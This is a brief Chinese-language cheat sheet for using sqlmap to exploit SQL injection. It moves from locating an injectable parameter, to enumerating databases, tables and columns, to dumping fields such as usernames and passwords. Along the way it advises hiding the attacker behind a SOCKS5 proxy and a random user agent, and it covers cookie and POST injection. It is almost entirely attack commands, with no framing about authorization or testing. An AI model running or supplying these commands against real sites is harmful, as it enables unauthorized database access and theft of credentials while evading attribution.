首先确定注入点:
sqlmap -u http://192.168.0.1 --data "search=df"
一般情况需要隐藏自己使用代理:参数:--proxy=socks5://127.0.0.1:1080
还可以设置浏览器的代理模式:--random-agent
指定数据库类型:-dbms mysql、oracle…..
当程序有防get注入的时候,可以使用cookie注入
-cookie level 2(只有等级2 才可以检测到cookie)
post注入:
抓包以后可以用 -p 指定注入点(这里也可以使用*标注)
确定注入点之后,查找数据库:
sqlmap -u http://192.168.0.1 --data "search=df" -dbs --proxy=socks5://127.0.0.1:1080
找到数据库之后,根据数据库查询表名:(例如数据库名为sysbase)
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase --tables
查询到表之后,看字段信息:(例如sys_user)
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase -T sys_user --columns
单线程跑的慢可以适当增加线程:--threads 5
有些也需要设置时间延迟:--time-sec 3000
有时候需要转码:--no-cast或者--hex
获取字段内容(username):
sqlmap -u http://192.168.0.1 --data "search=df" -D sysbase -T sys_use -C "username" --dump
从数据库中搜索字段
-D test -search -C admin,password 从数据库test搜索admin,password字段
